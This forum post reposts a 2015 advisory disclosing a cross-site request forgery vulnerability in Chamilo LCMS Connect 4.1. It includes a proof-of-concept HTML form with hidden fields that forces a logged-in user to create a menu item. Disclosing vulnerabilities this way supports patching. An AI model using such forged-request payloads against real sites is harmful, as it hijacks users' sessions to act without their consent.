Jump to content
Aerosol

Chamilo LCMS Connect 4.1 Cross Site Request Forgery

Recommended Posts

Hi Team,

#Affected Vendor: http://lcms.chamilo.org/
#Date: 27/03/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: XSRF
#Tested on: Windows 7
#Product: LCMS Connect
#Version: 4.1
#Description: Chamilo is an open-source (under GNU/GPL licensing)
e-learning and content management system, aimed at improving access to
education and knowledge globally. Chamilo LCMS is a completely new software
platform for e-learning and collaboration. The application is vulnerable to
XSRF attacks. If an attacker is able to lure a user into clicking a crafted
link or by embedding such a link within web pages he could control the
user's actions.

#Proof of Concept (PoC):
------------------------------------
<form method="POST" name="form1" action="
http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem
">
<input type="hidden" name="parent" value="0"/>
<input type="hidden" name="title[de]" value=""/>
<input type="hidden" name="title[en]" value="tester"/>
<input type="hidden" name="title[fr]" value=""/>
<input type="hidden" name="title[nl]" value=""/>
<input type="hidden" name="application" value="weblcms"/>
<input type="hidden" name="submit_button" value="Create"/>
<input type="hidden" name="_qf__item" value=""/>
<input type="hidden" name="type" value="core\menu\ApplicationItem"/>
</form>


--
Regards,

*Joel V*

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...